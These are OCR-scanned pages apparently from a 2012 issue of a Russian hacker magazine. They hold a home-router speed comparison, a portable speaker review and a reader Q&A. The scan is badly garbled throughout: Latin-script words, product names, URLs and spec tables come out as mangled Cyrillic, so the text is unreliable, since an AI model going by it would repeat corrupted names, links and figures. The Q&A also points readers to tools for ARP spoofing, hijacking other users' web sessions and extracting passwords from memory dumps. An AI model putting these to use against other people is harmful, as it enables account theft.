Вначале давай ознакомимся с методикой тестирования роутеров. 
Начнем с железа. Нам понадобятся сервер, клиент и ноутбук. Те- 
стировать будем на платформе ѴѴіпсІоѵѵз, поэтому на сервере уста- 
новлена МісгобоЙ ѴѴіпсІоѵѵз Вегѵег 2008 Р2 ВіапсІагсІ, а на остальных 
ПК- МісгозоЙ ѴѴіпсІоѵѵз 7 ІІИітаІе х64. Для измерения результатов 
и нагрузки канала будет использоваться пакет от компании Іхіа, 
содержащий в себе конечные точки (епсіроіпіз, должны быть уста- 
новлены на всех ПК, участвующих в тесте) и консоль управления 
ІхсЬагіоС ІхсЬагіоІ имеет в своем арсенале множество скриптов, мы 



же будем пользоваться іЬгоидЬриІ, для объективности. Каждый 
тест идет не менее минуты. На данном этапе тестирование можно 
поделить на три составляющие: 

1) Тест производительности протокола РРТР. На ПК с МісгозоЙ 
ѴѴіпсІоѵѵз Вегѵег 2008 Р2 ВіапсІагсІ поднимается РРТР-сервер, затем 
роутер настраивается на подключение по данному протоколу через 
\Л/АІ\І-порт. К І_АІ\І-порту подключается клиент. 

2) Тест производительности ЫАТ. Настройка аналогична первому 
случаю, только подключение настраивается через Віаііс ІР. 

3) Тест ѴѴі-Рі. К І_АІ\І-порту маршрутизатора подключается один 
клиент, а по беспроводной сети - второй. Таким образом, пропу- 
ская трафик между двумя ПК, мы можем оценить производитель- 
ность именно беспроводной сети. Также настраивается шифрова- 
ние ѴѴРА2-Р5К с ключом АЕ5. 

Стоит отметить, что для теста будут использоваться одноименные 
ѴѴіРі-«свистки»: А51І5 ІІ5В-Ы53, О-Ыпк йѴѴА-160, ТР-Ыпк ТІ_- 
ѴѴЫ821 N и 2уХЕІ_ ІМѴѴО2205 ЕЕ. Для остальных устройств применяем 
адаптер А51І5 У5В - N 53. 




134 



ХАКЕР 04/159/2012 




А51І5 КТ-Ы661І 



«Ой, какой красивенький», - фраза девушки техноманьяка, ко- 
торый приобрел себе А51І5 РТ-М61І. Действительно, этот роутер 
имеет необычный и привлекательный внешний вид. В компа- 
нии А51І5 учли недостатки предыдущей модели А51І5 РТ- N560 
и сделали корпус из матового пластика вместо глянца, а кроме 
того роутер теперь имеет три внешних антенны, располагается 
горизонтально, что более удобно, и его стало возможно повесить 
на стену. В общем, внешние недоработки предыдущего А51І5 РТ- 
N5611 были исправлены. 

Роутер А51І5 РТ-Ы661І сочетает в себе мощь и простоту настрой- 
ки, интуитивно понятный пользовательский интерфейс позволит 
разобраться в настройках даже новичку. Устройство оснащено 
двумя портами 115В, так что ты можешь одновременно использовать 
внешний накопитель и принтер для доступа к ним по сети. А51І5 РТ- 
N6611 напичкан серьезным железом и потому показывает отличные 
результаты в тестах: обошел конкурентов своего класса во всем, 
кроме одного параметра - скорость РРТР. Однако сегодня трудно 
найти провайдера, который бы обеспечивал доступ к интернету 
на скорости, превышающей 100 Мбит/с, а с этим А51І5 РТ-М61І 
справится легко. Кстати, этот роутер поддерживает ОиаІ Ассезв, что 
очень важно для большинства отечественных провайдеров. 
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□-ШКОЗК-БООЫ 

ВНЕ КОНКУРСА 



трогий и лаконичный внешний вид й-Ыпк 05Р-500Ы 
говорит нам о серьезной начинке и профессиональной 
направленности устройства. Крепления для серверной 
стойки, переднее расположение разъемов и два ѴѴАЫ-порта - все 
это фичи промышленного масштаба. Однако й-Ыпк 05Р-500Ы 
оснащен ІІ5В-портом и модулем ѴѴі-Рі (в крупных сетях чаще 
используются отдельные точки доступа), больше подходящими 
для дома и малого офиса. Таким образом, мы получаем гибрид, 
сочетающий в себе функционал как для дома, так и для большого 
офиса, и при этом обладающий железом, которое может выдержать 
серьезную нагрузку. 

Настройка й-Ыпк 05Р-500Ы аналогична настройке остальных 
продуктов й-Ыпк. Основные параметры может сконфигурировать 
и новичок, благо присутствует мастер пошаговой настройки интер- 
нета и сети ѴѴі-Рі. Описание всего функционала данного девайса 
не укладывается в формат статьи, так что скажем лишь, что вряд 
ли найдется человек, которого не устроят возможности 0-І_іпк 
05Р-500ІМ. 



Все бы хорошо, но большую ложку дегтя добавляет сырая про- 
шивка. Правда, инженеры 0-І_іпк заявляют, что в скором времени 
все будет исправлено. Хотелось бы верить, ведь такие несерьезные 
показатели работы по РРТР и ѴѴі-Рі смотрятся на фоне реальной 
производительности устройства просто смешно. 



ЫЕТСЕАК ѴѴЫОК4000 



лавные формы, черный глянцевый пластик, мягкие, не 
раздражающие светодиоды... Узнаешь? Правильно, оче- 
редной продукт от ЫЕТбЕАР - роутер ѴѴЫОР4000. Устрой- 
ство обладает хорошей производительностью, надежно и легко 
настраивается. Несмотря на то, что это общие слова, ЫЕТВЕАР 
действительно с каждой моделью совершенствует свои показате- 
ли производительности. Данный роутер стал очередной ступенью 
в линейке высокопроизводительных устройств. Роутер порадовал 
отличными скоростями РРТР и ЫАТ. Производительность беспро- 
водной сети оказалась на уровне выше среднего. Также ІМЕТ6ЕАП 
ѴѴІМОР4000 оснащен ІІ5В-портом, к которому может быть подклю- 
чен накопитель для общего доступа по сети. Подойдет для тех, кто 
превыше всего ценит надежность. 




ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Интерфейсы: 

Беспроводная точка доступа ѴѴі-Рі: 
Частотный диапазон: 
Безопасность: 

Функции роутера: 

Поддержка соединений: 
Дополнительно: 




ІхѴѴАИ (Р.І-45) 10/100/1000 Мбит/сек, 4х 
ЬАЫ (Р.І-45) 10/100/1000 Мбит/сек 
ІЕЕЕ 802.1 1 п 
2.4 ГГц, 5 ГГц 

ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР, АЕ5) 

ИАТ, ОупОИЗ, Біаііс ВоіЛіпд, ЦНСР, СІо5 
РРРоЕ, РРТР, І_2ТР, Зіабс/Цупатіс ІР 
Е25е*ир, ѴѴР5, медиа-сервер ІІРпР, 
АЮізк, 2x115В 



2х ѴѴАІМ (Р.І-45) 10/100/1000 Мбит/сек, 4х І_АІМ 
(Р.І-45) 10/100/1000 Мбит/сек 
ІЕЕЕ 802.1 1 п 
2.4 ГГц 

ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР, 
АЕ5) 

ІМАТ, йупОМЗ, БТаІіс Роиііпд, йНСР, Цо5 
РРРоЕ, РРТР, І_2ТР, Біаііс/Оупатіс ІР 
ѴѴР5, 1х 115В, управление через консоль, 
технология Сгееп 



ІхѴѴАИ (РЦ-45) 10/100/1000 Мбит/сек, 4х ЬДИ 
(Р^-45) 10/100/1000 Мбит/сек 
ІЕЕЕ 802.11 а/Ь/д/п 
2.4 ГГц, 5 ГГц 

ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР, 
АЕ5) 

ИАТ, ОупОИВ, ІРТѴ, 5іа1іс РоіЛіпд, йНСР, 0о5 
РРРоЕ, РРТР, І_2ТР, Біаііс/Оупатіс ІР 
Дополнительно: ѴѴР5, счетчиктрафика, 1х 115В 
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Сетевой форсаж 



2ѴХЕІ. КЕЕЫЕТІС 6І6А 



И 



мя 2уХЕІ_ хорошо известно в кругу людей, которые еще помнят, 
что такое доступ в интернет через ОіаІ-ІІр. По сей день ком- 
пании удается держать марку и выпускать хорошие роутеры. 
На этот раз в нашей лаборатории оказался 2уХЕІ_ КеепеЛс біда. Теперь 
поклонники линейки КеепеЛс могут радоваться появлению модели 
с гигабитным коммутатором и двумя разъемами 115В для подключе- 
ния накопителей или, например, принтера. Устройство по-прежнему 
обладает несколькими видами подключений к провайдеру — по вы- 
деленной линии, через 36/46-модем и по ѴѴі-Рі. Также КеепеЛс біда 
может работать в режиме точки доступа и моста беспроводной сети. 
Приобретая этот роутер, ты можешь быть уверен на 99.9%, что у тебя не 
возникнет проблем с подключением к какому-либо провайдеру, при- 
чем не только интернет-, но и ІРТѴ-провайдеру. 

Веб-интерфейс - просто песня. Например, на главном экране показана 
исчерпывающая информация, даже таблица маршрутов поместилась. 
Сама «админка» довольно шустрая, а настройки применяются за счи- 
танные секунды. Что касается скоростных показателей, то скорость 
ЫАТ на очень приличном уровне, а при использовании РРТР она просе- 
дает до средних показателей. Производительность беспроводной сети 
также уверенно держится средних показателей. 





ТР-иЫКТІ.-ѴѴІМ043№ 



И первую очередь этот роутер будет интересен тем, кто умеет 
считать деньги. ТР-Ыпк ТЫѴѴВ1043МО - самое дешевое 
устройство из нашего теста, при этом обладает гигабитным 
коммутатором и ІІ5В-портом. Однако данная модель показывает не са- 
мые высокие скорости. Тут важно понять, что ты хочешь от устройства: 
работу «из коробки» и высокую производительность или длительную 
установку и настройку сторонней прошивки? Если выбрать первый 
вариант, то на сегодняшний день для ТР-Ыпк ТЫ-ѴѴР1 043ЫО выпу- 
стили стабильную прошивку, которая дружелюбна, имеет неплохой 
набор функций и не зависает. Выбирая второй вариант, ты получаешь 
больший функционал (например, возможность подключить принтер 
к Ы5В- порту), однако сторонние прошивки совсем не гарантируют 
стабильной работы. Решать тебе, но в любом случае мы можем смело 
утверждать, что в данном ценовом сегменте устройство выглядит 
очень привлекательно. Из недостатков стандартной прошивки можно 
отметить долгое применение настроек. 






ТР-Ыпк Л- 
ѴѴК1043^ 




2уХЕІ_ КеепеЛс 
біда 



ІхѴѴАИ (Р.І-45) 10/100/1000 Мбит/сек, 
4х ЬАЫ (Р.І-45) 10/100/1000 Мбит/сек 
ІЕЕЕ 802.1 Іа/Ь/д/п 
2.4 ГГц 

ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2- 
РБК (ТКІР, АЕ5) 

ИАТ, ОупОИБ, Біаііс РоіЛіпд, йНСР, 
СІоБ 

РРРоЕ, РРТР, І_2ТР, БіаЛс/йупатіс ІР 
Дополнительно: ѴѴР5, 1x115В 



1х ѴѴАІМ (Р.І-45) 10/100/1000 Мбит/сек, 
4х ЛАИ (Р.І-45) 10/100/1000 Мбит/сек 
ІЕЕЕ 802.1 1 п 
2.4 ГГц 

ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2- 
Р5К (ТКІР, АЕ5) 

ІМАТ, йупОИБ, БіаЛс РоиЛпд, йНСР, 
ЦоБ 

РРРоЕ, РРТР, І_2ТР, БіаЛс/йупатіс ІР 
ѴѴР5, ТѴрогЛ2хІІ5В 



ВЫВОДЫ 

Итак, если ты все еще сомневаешься в своем решении, 
то мы тебе поможем. Взяв на вооружение А51І5 РТ-ИббІІ, 
ты получишь высокопроизводительное и функцио- 
нальное устройство — девайс имеет хороший запас по 
скорости, который — мы уверены — станет еще больше 
после выхода новых прошивок. А51І5 РТ-ИббІІ получает 
«Выбор редакции». 

Звание «Лучшей покупки» присваивается роутеру 2уХЕІ_ 
КеепеЛс 6І6Аза его «всеядность» и хорошую производи- 
тельность. ІЧЕТ6ЕАР ѴѴЫОР4000 впишется там, где нужна 
производительность и стабильность. Ну а модель ТР- 
Ыпк оказалась не только очень стабильной, но и самой 
доступной во всем тесте, і 



ХАКЕР 04/159/2012 



137 





ГЕМШМ 



ПРОИЗВОДИТЕЛЬНОСТЬ 

А51І5 РТ-М661І 
б-І_іпк 65Р-500М 
МЕТ6ЕАР ѴѴМ6Р4000 
ТР-І_іпкТІ_-ѴѴР1 043Мб 
2уХЕІ_ Кеепеііс 6І6А 

■ РОХ 

■ Ооѵѵпзігеат 

■ Іірзігеат 



ѴѴІ-РІ, 1 М, МБИТ/С 







— і — 
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Наглядное превосходство 5 ГГц канала. Что касается 2.4 ГГц, то впереди всех АЗиБ РТ-Ибби 



ПРОИЗВОДИТЕЛЬНОСТЬ 

А51І5 РТ-ИббІІ 
б-І_іпк 65Р-500М 
ИЕТбЕАР ѴѴМ6Р4000 
ТР-І_іпк ТІ_-\А/Р1043Мб 
2уХЕІ_ Кеепеііс 6І6А 

■ РОХ 

■ Ооѵѵпзігеат 

■ Іірзігеат 



РРТР, МБИТ/С 
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Даже А5Ц5 КТ-Ы661) выглядит слабым на фоне Ме(деаг№ЫОК4000 



ПРОИЗВОДИТЕЛЬНОСТЬ ИАТ, МБИТ/С 



А51І5 РТ-М661І 



б-Ыпк 65Р-500М 



МЕТ6ЕАР ѴѴМ6Р4000 



ТР-Ыпк И-ѴѴР1 043Мб 



2уХЕІ_ Кеепеііс 6І6А 
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Скорее бы и другие показатели О-Ыпк 05К-500Ы были схожи с данными при тесте ИАТ 



ПРОИЗВОДИТЕЛЬНОСТЬ 

А51І5 РТ-М661І 
б-І_іпк 65Р-500М 
МЕТ6ЕАР ѴѴМ6Р4000 
ТР-Ыпк Л-ѴѴР1 043Мб 
2уХЕІ_ Кеепеііс 6І6А 

■ РОХ 

■ Ооѵѵпзігеат 

■ Іірзігеат 



ѴѴІ-РІ, 6 М, МБИТ/С 






На удалении скорость уменьшилась пропорционально - вполне закономерно 



80 



"Т" 

90 



138 



ХАКЕР 04/159/2012 



РЕККІІМ 





МР15 РЬУЗ = 



шш 


; 1й 







Выходная мощность: 1.2x2 Вт 
Диапазон воспроизводимых 
частот: 100-20000 Гц 
Динамики: 

• диаметр: 40 мм 

• магнитное экранирование: 6 Ом 

Входная чувствительность: 

450 мВ 

Входной импеданс: 10 кОм 
Управление: селектор 
входа, воспроизведение/ 
пауза, переключение треков 
и радиостанций, громкость 
Режимы работы: 3.5 мм 
стерео вход, воспроизведение 
с 5б-карты, РМ-радио 
Габариты: 200x60x33 мм 
Масса: 0.2 кг 



Представим картину: счастливчик, купивший новый 
ноутбук, возвращается домой. Зажарив в микроволновке 
гору поп-корна и приготовив сладкой колы со льдом, он 
включает фильм, который давно хотел посмотреть. Каза- 
лось бы — идиллия. Но на протяжении всего просмотра 
не покидает ощущение, что что-то не так. А все из-за 
звука, доносящегося из «недодинамиков», встроенных 
в ноутбук. Конечно, динамики лэптопов класса Ні-ЕпсІ 
позволяют с комфортом посмотреть фильм и даже послу- 
шать музыку, но что делать обладателям более демо- 
кратичных моделей? Ответить на этот вопрос поможет 
продукт компании ЕсППег. 

ЕбіЛег МР15 Ріііб или ЕсШіег Аисііо Сапбу РІиз-это порта- 
тивная акустическая система — миниатюрное устрой- 
ство приятного дизайна. К нам в тестовую лабораторию 
попал семпл черного цвета, но данная модель представ- 
лена в различных цветовых вариантах на любой вкус. 
Система имеет несколько режимов работы. Первая и, 
пожалуй, самая главная функция — это воспроизве- 
дение музыки через линейный вход. Питается система 
от встроенного аккумулятора, а заряжается — от 115В. 
Второй и третий режимы — РМ-приемник и воспроизве- 
дение музыки с 50-карты соответственно. 

Настройка и управление системой происходят посред- 
ством набора клавиш, расположенных в ряд вверху 
устройства. Радует, что девайс снабдили небольшим 
дисплеем, на котором отображается нужная информа- 
ция - например частота радио и имя воспроизводимого 
трека. Функции стандартны и не отличаются от большин- 
ства оных у обычных портативных плееров, за исключе- 
нием того, что радио может работать без подключения 
наушников в качестве антенны. В комплекте с устрой- 



ством идут все необходимые кабели, а также чехол для 
транспортировки. 

Вообще существует множество портативных систем для 
воспроизведения звука, но ЕсІіІчегМРІб РІиз хорошо сба- 
лансирована в плане функционала и удобства. Такую ко- 
лонку можно везде возить с собой — карман оттягивать 
не будет, так как весит всего 200 грамм. Также можно не 
бояться повредить мембрану динамика — она защищена 
пластиковой дугой. 

Звук у ЕсПЯегМРІб РІиз такой, какой и должен быть 
у портативной колонки. В меру громкий, не перегружен- 
ный, без завышенных верхних частот. Эта система может 
с лихвой заменить множество настольных вариантов 
фирмы «ноунейм» большего размера. Для оценки звуча- 
ния мы использовали список треков, в который входили 
песни разных стилей и фильмы. Понятно, что прослуши- 
вание Іоззіезз-форматов на этом устройстве бессмыс- 
ленно, поэтому все звуковые дорожки воспроизводились 
в формате МРЗ. В качестве источника звука использова- 
лись ноутбук ТозЫЬа Заіеііііе 1_635-12С1и іРосІ папо 53. 



выводы 



Пока меломаны сравнивают количество золота в своих 
проводах, обычные юзеры уже выбрали Есііічег МР15 
РІиз в качестве портативной акустической системы для 
ноутбука. Что же мы получаем? В первую очередь, воз- 
можность смотреть фильмы и слушать музыку в разы 
комфортнее и громче, чем через встроенную систему. 
Во-вторых, карманное радио с плеером для выходов на 
природу. 

Таким образом, после знакомства с ЕсППег МР15 РІиз 
осталось только хорошее впечатление. □С 
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ІЖІТБ/РАСНІМТЕО 



Коллективный разум 



РАО ІІпіІесІ 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аЯЕАІ..ХАКЕР.ІШ 




Установил ѴѴіпсІоѵѵз 8 Сопзитег 
Ргеѵіеѵѵ, которую Місгозоіі только что 
вытащила из печки и еще тепленькой 
представила публике. Все отлично работает, 
но один момент — сильно коробит отсут- 
ствие кнопки «Пуск». Как же ее вернуть на 
место, назло предприимчивым парням из 
Місгозоіі, которые везде толкают свой 
Меіго-интерфейс? 

□ Выручит давно известная утилита 

ѴіЗіагІ ( Іее-зоЙ.сот/ѵізІагі ). которая 
изначально разрабатывалась для старушки 
ѴѴі п сіоѵѵз ХР, чтобы реализовать в ней меню 
«Пуск» новомодных на то время Ѵізіа/ 

ѴѴі п сіоѵѵз 7. По иронии судьбы она отлично 
работает и в новой «восьмерке». Правда, 
иконка «Пуск» будет накладываться на 
другие элементы таскбара, что легко 
исправить, если через контекстное меню 
«Добавить в панель задач» создать дополни- 
тельный пустой тулбар. Инструкция 
в картинках здесь: ЬіІ.Іу/ѵѵ7д5хѵ . 

Как сделать так, чтобы в ѴѴіпсІоѵѵз 8 по 
умолчанию запускался не Меіго- 
интерфейс, а нормальный рабочий стол? 



1. Через «Автозагрузку». 

Заходим в папку С:\ІІ5ег5\<ІІ5ег РгоП1е>\ 
Арр0аІа\Роатіпд\Місго5оИ\ѴѴіпсіоѵѵ5\ 

5іагІ Мепи\Ргодгатз\5іагІир и добавля- 
ем там ярлык, ссылающийся на «ехріогег. 
ехе 5ЬеІІ:::{3080Р900-07АО-1 Ю9-В098- 
0000947В0257}». 

2. Через стандартный планировщик. 

Нажимаем ѴѴіп-Р и через «Выполнить» 
запускаем ІазкзсМ.тзс. Далее создаем но- 
вую задачу, кликнув на «Сгеаіе Іазк». Важно 
сделать так, чтобы задача выполнялась на 
старте системы, поэтому добавляем триггер 
(Тгіддегз -> Ыеѵѵ), выбирая «Ведіп 1Ье Іазк: Аі 
Іод оп» и устанавливая небольшую задержку 
(«йеіау Іазк Іог: 5 зесопсіз»). В качестве дей- 
ствия выбираем запуск программы («Асііоп: 
5іагІ а ргодгат») и в качестве приложения 
указываем «ехріогег.ехе зЬеІІ:::{3080Р9СЮ- 
07А0-1 1 09- В 098- 0 00 0947В 0257}». 

Для довольно посещаемого сервиса 
хочу запустить ЗаЬЬег-бота. Нагрузка 
ожидается приличная, поэтому сразу 
хочется сделать по уму. Есть ли какие-то 
готовые решения и заготовки, которые я 
смогу использовать? 



( іѵѵізІесІтаІгіх.сот/Ігас/ѵѵікі/ТѵѵізІесІѴѴогсІз І. 

ѴѴоккеІ ( ѵѵоккеі ,і к.п и ). БІеекХМРР ( сосіе. 
доодіе.сот/р/зіеекхтрр ) — это, пожалуй, 
наиболее успешные, но далеко не все. 
Помимо этого есть замечательный сервис 
ІМШесІ [ тіРесІ.сот ). позволяющий работать 
с разными сетями через специальный НТТР 
АРІ. 

□ Как быстро запустить на своем 

ноутбуке виртуальную точку доступа? 
В качестве ОС используется ѴѴіпсІоѵѵз. 

□ Существует огромное количество 

специальных утилит, о которых мы уже 
писали. Например, ѴѴі Рі НоіЗроІ Сгеаіог 
( уѵірііоізроісгеаіог.сот ) позволяет реализо- 
вать это буквально в два клика. Нужно лишь 
указать 55Ю, парольную фразу для ѴѴРА2 
и выбрать сетевой интерфейс с выходом 
в инет, чтобы расшарить подключение 
к внешней сети. 

□ Выбираю наиболее безопасный 

мессенджер, который обеспечивал бы 
шифрование трафика. Какие есть вариан- 
ты? 







Необходимо сделать так, чтобы на 
старте системы запускался нужный 



шелл. 



Существует огромное количество 
библиотек для ХМРР-протокола, в том 
числе, например, для РуіЬоп. Тѵѵізіесі ѴѴогсІз 




□ А: Можно не сильно морочить себе 
голову и использовать привычный 
ЗаЬЬег. Во-первых, большинство серверов 



КАК ОТЛАДИТЬ 35-КОД НА МОБИЛЬНОМ УСТРОЙСТВЕ? 



ы стремительно приближаемся ктому 
моменту, когда большинство людей 
будут выходить в интернет не с ком- 
пьютеров, а с мобильных планшетов и смарт- 
фонов. Возрастает сложность мобильных 
версий сайтов, но и их разработка усложня- 
ется тем, что для браузеров в АпбгоісІ и І05 
неттаких мощных инструментов как РігеЬид 
(аддон для Рігеіох) или ѴѴеЬ Іпзресіог (опция 
ѴѴеЬКіІ-браузеров), которые программисты ис- 
пользуют для отладки сложного 35-кода. Нет 
более удобного способа пошагово выполнить 



сценарий или на лету поправить какие-нибудь 
параметры в йОМ-модели страницы, но, увы, 
мобильных версий этих инструментов пока (и я 
уверен, что только пока) нет. Впрочем, с учетом 
огромного количества разработок в этой об- 
ласти, было бы странно, если разработчики 
не нашли бы подходящих альтернатив. Их 
несколько. Причем разрабатываются они как 
просто энтузиастами, так и гигантами вроде 
АбоЬе. 



Существует такой проект как ѵѵеіпге 
( рбопедар.дііЬиЬ.сот/ѵѵеіпге ). кото- 
рый очень похож на РігеВид и ѴѴеЬ 
Іпзресіог, но обладает одним важным отличием 
— он предназначен для удаленной отладки 
и, в частности, позволяет выполнять отладку 
страниц на мобильных устройствах. Таким 
образом, дебаггер может быть запущен на 
компьютере, а отлаживаемая страница ото- 
бражаться, скажем, на смартфоне. Сейчас под- 
держиваются АпбгоісІ, Ю5, ВІаскВеггу, ѵѵеЬОЗ. 
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РАСОІІМІТЕО 



сейчас поддерживают работу через 
безопасное 551-соединение (даже если ты 
используешь бТаІк через браузер, весь 
трафик по умолчанию идет по НТТР5). 
Во-вторых, в большинстве клиентов можно 
включить шифрование через ОТР (ОПЧЬе- 
Ресогсі). Это протокол шифрования сообще- 
ний для сетей обмена мгновенными 
сообщениями. Основные свойства протоко- 
ла: 

• шифрование сообщений — никто иной не 
сможет прочитать переписку; 

• аутентификация пользователей — уве- 
ренность в том, кто является собеседни- 
ком; 

• сложность в дешифровке — дажеесли 
потеряны секретные ключи, прошлая 
переписка не будет скомпрометирована; 

• возможность отречения — третье лицо не 
сможет доказать, что сообщения написаны 
кем-либо другому адресату. 

ОТР поддерживается (по умолчанию или 
с помощью плагинов) в АсПит, Рібдіп, Кореіе, 
Мігапсіа ІМ, ТгіІІіап, циНМ, Рзі+ и прочих. 

□ Какие инструменты можно использо- 
вать для деобфускации ЭаѵаБсгірІ- 
кода НТМІ_-страницы и, прежде всего, 
зловредной нагрузки (уж кто-то, а плохие 
ребята всегда прибегают к обфускации)? 

□ Как известно, Эаѵа5сгірІ-код, 
особенно зловредный, нередко 
вставляется в обфусцированном (намеренно 
запутанном) виде — ты можешь его прочи- 
тать, но его логику понять без обработки 
невозможно. В нормальный вид он преобра- 
зуется браузером уже во время выполнения. 
Существует немало инструментов, позво- 
ляющих выполнить деобфускацию Э5-кода 
— например, МаІгіІІа ( таігіііа.воигсеіогае. 
пеі). В Сети можно найти достаточно 
примеров, как с ее помощью восстанавлива- 
ется исходный код боевых нагрузок 
(пейлоадов) различных сплоитов и сплоит- 
паков. 



БОЛЬШОЙ ВОПРОС 



В ЧЕМ СМЫСЛ ПРОТОКОЛА 
5РйУ, ПРОДВИГАЕМОГО 
СЕЙЧАС бООббЕ, И КАК ЕГО 
МОЖНО ИСПОЛЬЗОВАТЬ? 



5Р0У (произносится как «спиди») 
— это экспериментальный сетевой 
протокол, который разрабаты- 
вается в боодіе и активно продвигается 
в качестве замены устаревшему НТТР. 
Важно, что это не просто проект (хотя про- 
токол еще находится в стадии черновика) 
— это уже работающая технология. Его уже 
сейчас поддерживают браузеры боодіе 
СНготе и последняя версия Ріге^ох, с его 
помощью отдают НТТР-контент некоторые 
сервисы боодіе (например, бтаіі), а также 
Тѵѵіиег. 

Разработанный в начале 90-х годов про- 
токол НТТР хотя и справляется с задачей 
по доставке содержимого веб-страниц, 
но делает это не оптимально. Один запрос 
на одно ТСР-соединение, возможность 
инициировать подключение только со 
стороны клиента, несжатые и к тому же 
избыточные заголовки запросов и от- 
ветов — все это накладывает серьезные 
накладные расходы на доставку содержи- 
мого страниц, которая выражается в уве- 
личенном времени загрузки страницы. 




Цель разработчиков 5РйУ — уменьшить 
время загрузки страницы на 50% без 
необходимости менять сетевую инфра- 
структуру (для этого он работает поверх 
привычного ТСР). Для этого разработчики 
реализовали возможность передачи не- 
скольких НТТР-запросов в одном пакете, 
ввели сжатие заголовков, отказавшись 
при этом от избыточности (к примеру, 
клиенту необязательно каждый раз пере- 
давать свой ІІзег-АдепЦ, реализовали 
возможность инициировать передачу 
данных со стороны сервера и отдавать 
данные клиенту тогда, когда это необхо- 
димо. Очень подробно и доходчиво об этом 
пишет сам боодіе ( сНготіит.огд/зрсІѵ/ 
зрс!ѵ-ѵѵНі1:ерарег ), где он делится резуль- 
татами бенчмарков, демонстрирующих 
эффективность 5РйУ. Там же очень скоро 
будут доступны исходники веб-сервера, 
поддерживающего 5Р0У. Сейчас же экс- 
периментальный модуль для поддержки 
протокола доступен для АрасНе ( собе. 
доодіе.сот/р/тоб-зрбѵ ), есть открытый 
проект на Ру*Ноп ( аііНиЬ.сот/тпоі/пЬШр/ 
1:гее/зрсІ у ). Для СНготе, к слову, можно 
поставить аддон ( ЫРІѵ/хІбебі ). который 
в адресной строке отображает, по какому 
протоколу передаются данные — НТТР 
или 5Р6У. 



^ С О ■ Ьгиіэти ,■ /прЕ-іпІаіти.Іі.,' ІѵкіпІ ъ 



Ніэдзыйіпд АигнѵйіЪ мѵыіт 



СйеИуг* 


*М|І 


Н«Г4Э* 


ЕлроЛ 


■ № ІНЙН 


ммрім 


ІгпррП 


ІВ2» І«Т ПХЭИСМ 


т*\ ѵОлйСіі 


Риму 


іии *№г нтѵ 


мтмт рИй (МіСП 




■пн №йт ІШ№ 


ітлг.ДОР*4№1.*іі івВДСП 



Встроенная в СНготе утилита (чтобы ее запустить, достаточно набрать в адресной строке: сНготе://пеЫп(ег- 
паЫ подтверждает работу некоторых сайтов через БРРУ. 



Компания АбоЬе в рамках своего 
проекта АбоЬе І_аЬ недавно опублико- 
вала инструмент АбоЬе 5Ьабоѵѵ ( ІаЬз. 
абоЬе.сотЛесЬпоІодіез/зНабоѵѵ ). С помощью 
этого инструмента можно связать между собой 
браузер на компьютере (пока поддержива- 
ется только СНготе) и браузер на мобильном 
устройстве (операция называется раігіпд). 
Таким образом удается добиться синхронизи- 
рованного серфинга и обновления просматри- 
ваемых страниц одновременно на компьютере 
и, к примеру, планшете. 



Помимо этого можно использо- 
вать удаленную баѵабсгірі-консоль 
(ізсодзоіехопп) — правда, для этого 
ее код придется предварительно вставить 
в отлаживаемую страницу. При открытии стра- 
ницы специальный сниппет будет стучаться на 
сервер и передавать отладочную информацию. 
Процесс отладки соответственно осуществля- 
ется через консоль. На сайте есть отличная 
инструкция ( ]5сопзоІе.сот/гетоІе-беЬиддіпд. 
Мші) о том, как выполняется удаленная от- 
ладка. 



В качестве удаленной баѵабсгірі- 
консоли также можно использовать 
проект Ретоіебб ( ЬіЕІѵ/ѵѵРбЗОЕ ). 
Проект имеет две версии: первая реализована 
в виде 61111-приложения, вторая же написа- 
на на РуіЬоп и работает в консоли. Правда, 
в списке поддерживаемых мобильных плат- 
форм пока только Апбгоіб. Зато этот вариант 
рекомендуют разработчики 5епсЬа — извест- 
ного фреймворка, реализующего интерфейс 
мобильных приложений на РІТМІ_5. 
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ІЖІТБ/РАСНІМТЕО 



□ Можно ли запустить утилиты для 

прослушивания беспроводного эфира 
и инъектирования произвольных пакетов 
(например, аігсгаск-пд) под АпсІгоісІ? 

□ На известном форуме хсіа-сіеѵеіорегз. 

сот, где обитают разработчики 
кастомных прошивок и различных хаков для 
мобильных устройств, есть несколько тем по 
тому, как можно внести необходимые патчи 
в ядро АпсІгоісІ и благодаря этому запустить 
аігосіитр и аігсгаск-пд (например, Ьіі.Іѵ/ 
2 ПГІІВ ). Однако, во-первых, предложенные 
действия — нетривиальны, а во-вторых, 
подойдут не для любой платформы. Поэтому 
если необходимо просто отснифать трафик 
в беспроводной сети, то можно воспользо- 
ваться связкой утилит йгоісІБЬеер 
( сі гоісІзИеер.сІе ] и БЬагк Іюг Рооі ( ЬіІ.Іѵ/ 
ѵѵрехЬА ). Первая, напомню, выполняет АНР 
БрооЛпд и извлекает из эфира пользова- 
тельские сессии (например, для ВКонтакте). 
Вторая же позволяет сохранить перехвачен- 
ные данные в РСАР-формате, которые позже 
можно проанализировать, например, 
с помощью ѴѴігезЬагк. 



□ Как выполнить дамп оперативной 
памяти виртуальной машины, 
пригодный для последующего анализа? 



□ В случае с ѴМѵѵаге все проще простого: 
для каждого зпарзЬоКа, созданного 
для виртуальной машины, есть файл 
с расширением .ѵтет — это и есть дамп 
памяти. В случае с ѴИиаІВох'ом можно 
поступить следующим образом. 



1. Запустить виртуальную машину через 
консоль с параметрами: 

ѴИиаІВох - -сі Ьд --зіагіѵт <ѴМ пате> 



2 . Открыть меню «йеЬид» и выбрать там 
«Соттапб Ііпе...». 

3. В консоли выполнить команду 
«.рдтрЬузІоНІе <П1епате>», указав, куда 
именно нужно сохранить бит р. 

Анализ в свою очередь можно осуще- 
ствить с помощью известного фреймвор- 
ка Ѵоіаіііііу ( сосіе.доодіе.сот/р/ѵоіаіііііу ). 

Есть также решения вроде Раззѵѵаге 
( Іозіраззѵѵогб.сот/кіЫогепзіс.Ьіт ), позво- 
ляющие извлечь из таких дампов различные 
пароли. 

Есть точка доступа, пароль для 
которой устанавливал предыдущий 
